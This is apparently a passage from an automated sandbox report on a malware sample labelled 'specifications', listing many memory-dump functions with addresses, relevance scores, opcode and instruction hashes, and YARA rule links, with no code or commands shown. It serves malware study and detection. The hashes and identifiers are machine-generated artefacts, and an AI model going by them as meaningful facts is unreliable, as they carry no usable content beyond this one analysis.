                                                                                                                                                                                  • Opcode Fuzzy Hash: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D90043D311510031105F55C47045070057D7D5351355C033F1415550CD731CD715333
                                                                                                                                                                                  Function 010C2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
                                                                                                                                                                                  • Instruction ID: 43ab85abedfba76fa2b69735bdd00e5012b9d28fe89aea4a6aa6fab7ab34c2c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
                                                                                                                                                                                  • Instruction Fuzzy Hash: B2900229221510021145B55C460450B0455A7D6351395C016F1816590CC62189655322
                                                                                                                                                                                  Function 010C2D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
                                                                                                                                                                                  • Instruction ID: 78d799a7d9ba078d425175d8babcbec8f55bf7b33ef422a9d57828c073fb2ea6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
                                                                                                                                                                                  • Instruction Fuzzy Hash: B490022520555442E100755C9408A06001597D0205F55D012E1464595DC6358951A232
                                                                                                                                                                                  Function 010C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                                                                                                                                                                  • Instruction ID: ecfa70658b9b39eb20faddcd07cbe90cf9d34dc28c44ff2749ae8877a6ea2815
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2290022D21351002E180715C940860A001597D1202F95D416E0415558CC91589695322
                                                                                                                                                                                  Function 010C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                                                                                                                                                                  • Instruction ID: 8628e9bab6a4280b3c2e93b823e84efe5b47ea11ff470ed144b555e552725cd5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE90022530151003E140715C94186064015E7E1301F55D012E0814554CD91589565323
                                                                                                                                                                                  Function 010C2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                                                                                                                                                                  • Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
                                                                                                                                                                                  • Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62
                                                                                                                                                                                  Function 010C2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                                                                                                                                                                  • Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722
                                                                                                                                                                                  Function 010C2C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                                                                                                                                                                  • Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622
                                                                                                                                                                                  Function 010C2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                                                                                                                                                                  • Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232
                                                                                                                                                                                  Function 010C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                                                                                                                                                                  • Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2
                                                                                                                                                                                  Function 010C2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                                                                                                                                                                  • Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
                                                                                                                                                                                  • Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222
                                                                                                                                                                                  Function 010C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                                                                                                                                                                  • Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
                                                                                                                                                                                  • Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                                                                                                                                                                  • Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227
                                                                                                                                                                                  Function 010C2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                                                                                                                                                                  • Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
                                                                                                                                                                                  • Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337
                                                                                                                                                                                  Function 010C2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                                                                                                                                                                  • Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
                                                                                                                                                                                  • Opcode Fuzzy Hash: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A90023520191402E100715C881470B001597D0302F55C012E1564555DC62589516672
                                                                                                                                                                                  Function 010C2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                                                                                                                                                                  • Instruction ID: 15ccf085ea955a9f8cf04d686fd7131f5c102fe7d2daacf0ffed59c704dd16b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                                                                                                                                                                  • Instruction Fuzzy Hash: B790023520191402E100715C8808747001597D0302F55C012E5564555EC665C9916632
                                                                                                                                                                                  Function 010C2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                                                                                                                                                                  • Instruction ID: bd63e9d360c8fc32940e01b5e3bfe276d81c83880dc6b2e3e915f593f13d48ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F900225601510425140716CC8449064015BBE1211755C122E0D98550DC55989655766
                                                                                                                                                                                  Function 010C2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                                                                                                                                                                  • Instruction ID: f9e4b64ccdf6de43697c09f54e28a01be5dd1c21a44b465b23d6e37b0fffc015
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58900225211D1042E200756C8C14B07001597D0303F55C116E0554554CC91589615622
                                                                                                                                                                                  Function 010C2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                                                                                                                                                                  • Instruction ID: 59a296c1882d376c5ffca640d23a70516df835ee6199f4ea7046ba19122cb285
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                                                                                                                                                                  • Instruction Fuzzy Hash: B990022530151402E102715C84146060019D7D1345F95C013E1824555DC6258A53A233
                                                                                                                                                                                  Function 010C2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                                                                                                                                                                  • Instruction ID: f12143e3dfc50a638a691c591602be029386b53a50cea896c01e4641a6047eb6
                                                                                                                                                                                  • Opcode Fuzzy Hash: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC90022560151502E101715C8404616001A97D0241F95C023E1424555ECA258A92A232
                                                                                                                                                                                  Function 010C2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                                                                                                                                                                  • Instruction ID: 3222d2b25440912e98916495796444b4e6e13cfb5da51f9e8f70c26cbc571d53
                                                                                                                                                                                  • Opcode Fuzzy Hash: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D90027520151402E140715C8404746001597D0301F55C012E5464554EC6598ED56766
                                                                                                                                                                                  Function 010C2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                                                                                                                                                                  • Instruction ID: 48d62672ad2af1dd8117a263e1245aef0e18e92ea8fc19626cffa350247d4461
                                                                                                                                                                                  • Opcode Fuzzy Hash: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC90026520191403E140755C8804607001597D0302F55C012E2464555ECA298D516236
                                                                                                                                                                                  Function 010C3010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
                                                                                                                                                                                  • Instruction ID: 013d9097e31262e8d932d5a6bf1782e161c0641e20f9ee7ef48a890494d0f334
                                                                                                                                                                                  • Opcode Fuzzy Hash: c367a7a73f32f3a19ccd78391ec176f60a144906f8683c509720baef597335f6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6490022520195442E140725C8804B0F411597E1202F95C01AE4556554CC91589555722
                                                                                                                                                                                  Function 010C3090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
                                                                                                                                                                                  • Instruction ID: cfaaafe9771839168c619591c60e100dd126ffec722574b78cbdf098f969b0bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9590022524151802E140715CC4147070016D7D0601F55C012E0424554DC6168A6567B2
                                                                                                                                                                                  Function 010C39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
                                                                                                                                                                                  • Instruction ID: f4dcbe2f876b82df825029d6e11a5b883b781860671f80d9dd05dfc58195520b
                                                                                                                                                                                  • Opcode Fuzzy Hash: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC90022524556102E150715C84046164015B7E0201F55C022E0C14594DC55589556322
                                                                                                                                                                                  Function 010C3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                                                                                                                                                                  • Instruction ID: f6021ed495f5f2aa8f8e08767c6e668882adaf536544cb56668249e49d0b7ef2
                                                                                                                                                                                  • Opcode Fuzzy Hash: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2890023520251142A540725C9804A4E411597E1302B95D416E0415554CC91489615322
                                                                                                                                                                                  Function 010C3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                                                                                                                                                                  • Instruction ID: e7d6ee4cf95f8375d5b0b8343d4699337ff36a6468ed4792a5af16eb92146ff6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                                                                                                                                                                  • Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222
                                                                                                                                                                                  Function 010C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                  • Instruction ID: 8180b858bc80128465cbe62474224157435153773c8158baaad54eb40a782727
                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                  Function 010C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
